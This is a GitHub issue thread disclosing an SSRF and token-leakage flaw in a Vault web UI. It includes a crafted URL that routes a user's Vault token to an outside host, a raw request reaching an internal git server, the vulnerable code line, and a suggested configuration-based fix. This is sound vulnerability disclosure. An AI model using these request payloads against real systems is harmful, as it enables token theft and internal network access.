Security issue. Token leakage
anton00706 opened this issue · 5 comments
Hi.
Our security team tested your UI and found a vulnerability.
Here is a feedback from them:
Step-to-reproduce
Token leakage:
- Login to vault ui with token
- visit http://spb-off-vault01.team.wrike.com:8000/v1/sys/capabilities-self?vaultaddr=http:%2F%2Fifyoucanyoucantest.pythonanywhere.com%2fexamples%2fsimple_examples%2fhello3.html%3f
- Open file token.txt at 192.168.3.105
Access token stolen.
Internal resources access:
- Disable VPN and send request
GET /v1/sys/capabilities-self?vaultaddr=https:%2F%2Fgit.wrke.in HTTP/1.1
Host: spb-off-vault01.team.wrike.com:8000
...
you got git.wrke.in content, but we assume, that attacker can no has access to it
Actual result
Token stolen, internal resources accessed
Expected result
No SSRF
Area of Responsibility
Other
Recommendation
Do not user input, take value of target host from configuration.
Currently in /src/vaultapi.js:
let vaultAddr = req.query.vaultaddr;
but should be something like this:
let vaultAddr =config['vaultaddr']
Soooo. any suggestions for another UI that's not this one @anton00706 ?
@reverendtimm the official one ?
See https://www.hashicorp.com/resources/vault-oss-ui-introduction
@JorisInsign noice. Thanks.
- What is the status of this issue?
- Repro steps are not very clear.
There has been no response from a developer, nor has there been a commit since this issue was opened.
So at this point, I don't even care if the issue is real. (Though I think it is). Clearly using Vault-UI to access (company) secrets is a no-go.